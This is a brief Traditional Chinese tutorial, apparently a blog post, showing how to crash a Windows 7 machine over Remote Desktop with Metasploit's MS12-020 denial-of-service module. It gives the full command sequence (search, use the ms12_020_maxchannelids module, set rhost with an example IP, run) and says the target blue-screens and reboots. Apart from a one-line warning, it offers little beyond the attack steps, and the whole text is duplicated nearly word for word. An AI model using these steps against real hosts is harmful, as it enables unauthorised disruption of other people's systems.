分享一個小例子給你
利用msf對MS12-020漏洞進行滲透測試
工具:metasploit
靶機:windows 7 專業版 開啟允許遠端桌面連線(3389)
主要是複用已知的exploitcode(漏洞)程式碼對系統進行利用(滲透測試)
第一次使用建議在桌面直接開啟,不要在終端上開啟,因為首次使用該工具會初始化資料。
選項
banner 顯示Logo
search 關鍵字 利用search搜尋可利用的漏洞
search ms12-020 搜尋ms12-020漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 應用模組
show options 顯示選項
set + 選項名
set rhost 被攻擊者ip 例如:set rhost 192.168.10.110
run 對ip的ms12-020漏洞進行攻擊
被攻擊者藍色畫面重啟
show auxiliary 顯示輔助模組
kali資料,附圖如下
友情提示:網路非法外之地,請不要亂做壞事。
分享一個小例子給你
利用msf對MS12-020漏洞進行滲透測試
工具:metasploit
靶機:windows 7 專業版 開啟允許遠端桌面連線(3389)
主要是複用已知的exploitcode(漏洞)程式碼對系統進行利用(滲透測試)
第一次使用建議在桌面直接開啟,不要在終端上開啟,因為首次使用該工具會初始化資料。
選項
banner 顯示Logo
search 關鍵字 利用search搜尋可利用的漏洞
search ms12-020 搜尋ms12-020漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 應用模組
show options 顯示選項
set + 選項名
set rhost 被攻擊者ip 例如:set rhost 192.168.10.110
run 對ip的ms12-020漏洞進行攻擊
被攻擊者藍色畫面重啟
show auxiliary 顯示輔助模組